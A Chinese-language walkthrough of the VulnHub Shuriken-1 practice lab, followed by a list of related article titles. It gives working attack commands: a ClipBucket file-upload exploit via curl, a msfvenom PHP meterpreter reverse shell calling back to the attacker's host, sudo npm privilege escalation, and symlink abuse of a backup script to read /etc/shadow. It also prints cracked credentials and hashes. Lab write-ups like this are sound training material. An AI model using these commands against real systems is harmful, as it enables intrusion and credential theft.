Shuriken-1靶机渗透总结

靶机下载地址:
https://download.vulnhub.com/shuriken/Shuriken-1.ova

  1. 将Shuriken-1虚拟机设为NAT模式后,打开虚拟机,通过nmap扫描出其ip和端口

  2. 通过开放的80端口,打开网站

  3. 信息收集,发现js文件存在两个链接

  4. 尝试去打开链接,发现了一个存在文件包含的地方

    Broadcas.shuriken.local无法直接打开,需要加到hosts文件中

    打开网站后发现需要登录

  5. 尝试通过文件包含读取apache2的配置文件,发现了存放密码的路径,紧接着去读取密码

    /etc/apache2/sites-enabled/000-default.conf
    


    读取到了密码

    developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
    

  6. 接下来就是对密码的破解,这里利用john工具

    john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/hash
    john --show  /home/kali/Desktop/hash
    

    破解后的密码: 9972761drmfsls

    并且登录后发现是ClipBucket 4.0

  7. 尝试去网上搜寻符合符合的漏洞,在exploit网站找到一个,可以文件上传的exploit

    curl --basic --user "developers:9972761drmfsls" -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"  http://broadcast.shuriken.local/actions/beats_uploader.php
    

  8. 准备要上传的文件,这里上传一个msfvenom生成的shell

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.11.131 LPORT=12345 -f raw -o  /home/kali/Desktop/shell.php
    


  9. 通过上传成功后返回的文件名和后缀加路径,可以找到上传的php文件,并且运行
    http://broadcast.shuriken.local/actions/CB_BEATS_UPLOAD_DIR/

  10. 在kali里面利用msf开启监听,成功连接shuriken靶机

  11. 当前用户是www-data,考虑提权,经过发现,使用sudo –l 命令
    看到了server-management用户无密码使用npm命令,存在sudo滥用提权

    并且在https://gtfobins.github.io/找到了对应的提权命令

    touch package.json
    echo '{"scripts":{"dev":"/bin/bash"}}' > package.json
    sudo -u server-management npm run dev
    

    成功提权到server-management用户

  12. 在server-management用户的家目录下发现了user.txt
    获得了第一个flag
    67528b07b382dfaa490f4dffc57dcdc0

  13. 紧接着考虑提权至root的方法
    这里没有找到提权的方法
    但是发现了一个奇怪的进程

    经过查看backupsrv.sh内容
    大概理解这个进程的作用是,在/var/backups目录下生成一个tgz文件
    文件名字是时间和主机名字的组合
    并且tgz文件的内容是/home/server-management/Documents目录里面的内容

  14. 利用这点,我们可以下载/etc的文件
    观察了一下,该sh大概每分钟会被执行一次,由于sh中参数不能修改,于是这里删除了/home/server-management/Documents文件夹,做了/etc到Documents的软连接,压缩成功后将其拷贝到/var/www/main(注意:需切换到www-data用户),下载后获取到shadow文件


    cp /var/backups/shuriken-Sunday.tgz /var/www/main

  15. 下载之后,对应的tgz文件内容是对应的/etc的文件内容,在里面打开了shadow文件,获取了root的密码,但是这里不会解密

    $6$KEYGm0ZQ$oTT3SYXna/5H61MZCwqvY995xtDqHGaMe5LRrMXNtVLLDVwfoj.DtJ0AQk6wfhAfOW23uR6wqd7UC5I7MPq0a0
    

  16. 无法解密,直接同步骤将/root文件下载下来,打开里面的root.txt文件
    获取了第二个flag
    d0f9655a4454ac54e3002265d40b2edd

Shuriken-1靶机总结相关推荐

  1. 靶机渗透练习90-Grotesque:1.0.1

    靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium ...

  2. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  3. HA: InfinityStones靶机渗透测试

    文章目录 靶机信息 一.信息收集 1.主机发现 2.端口扫描 3.目录扫描 二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...

  4. HA: Forensics靶机渗透测试

    文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...

  5. HA: Dhanush靶机渗透测试

    文章目录 一.信息收集 1.主机发现 2.端口扫描 3.查看 web 服务 二.漏洞挖掘 1.使用 cewl 生成字典 2.使用 hydra 进行爆破 3.ssh 连接 4.尝试 sudo 提权 靶机 ...

  6. Lampiao靶机渗透测试

    文章目录 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.查看对方web服务 2.使用 msfconsole get shell 脏牛提权漏洞(CVE-2016-5191) 三.脏牛提权 ...

  7. 漏洞payload 靶机_【CS学习笔记】5、如何建立Payload处理器

    这一小节学起来感觉有些吃力,里面很多概念理解的不是很清楚,如果有大佬看到描述错误的地方欢迎留言指正,避免误导他人. 再次声明,这只是我的个人学习笔记,不要当成教程去看,建议想学习CS的小伙伴可以看看A ...

  8. docker 漏洞测试 靶机环境 靶机平台 vulhub vulapps 简介

    在实际学习中,经常需要模拟不同的漏洞环境,而使用公网的实例的话,多多少少又存在一些风险,因此能搭建一个本地的模拟环境去测试漏洞是一个不错的方案.Docker是近两年来十分流行的开源容器引擎,因此也出现 ...

  9. php %3c php 攻击,web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

最新文章

  1. 深入浅出ShellExecute(总结)
  2. TensorFlow实验(3)
  3. stylus 设置全局样式_在vue-cli 3中, 给stylus、sass样式传入共享的全局变量
  4. 连接mysql出现Access denied for user ‘root’@’localhost’ (using password:YES)问题解决办法...
  5. 祝贺泰山OFFICE CDKEY长度25,吾已成为顶级CDKEY砖家
  6. 大学生学计算机笔记本配置,上大学该买什么笔记本?推荐给准大学生的几款本...
  7. 个性字体头像在线图片生成下载网址
  8. 纯HTML5后台模板
  9. 2020 android平板推荐,2020年2000元左右的平板哪一款好?2000元左右的平板推荐
  10. 简述linux操作系统的功能是什么,什么是Linux操作系统及其功能
  11. 灼口综合征的症状这么多呢呀?!
  12. 基于C++的UKF代码示例,跟踪三次多项式曲线
  13. C#-MSDN学习提高
  14. Python各版本安装包下载
  15. QQ群加入代码在线获取
  16. Flash按键响应-键码值表
  17. nginx是什么?有什么用?
  18. 风华才气,春华秋实———忆信管学子杨友岁月如歌
  19. 苹果系列手机清除的文件如何恢复的呢
  20. 5g无线图传信号测试软件,5G时代,移动无线图传网络构架和无线图传传输技术...

热门文章

  1. 【幻灯片制作软件】Focusky教程 | 怎么有效利用图片幻灯片 ?
  2. 开源公告|腾讯云代码分析(TCA)对外开源
  3. 色彩滤波阵列Color Filter Array
  4. Unity 初学3 爆炸效果代码
  5. Android开发:app工程集成银联支付功能(服务器端)
  6. ISACA发布SIEM研究报告
  7. python爬虫自学习1+京东商品爬取实例
  8. Java爬取京东商品数据
  9. 台式计算机如何除尘,台式机如何除尘
  10. 深度学习 Day 4——利用RNN玩转股票预测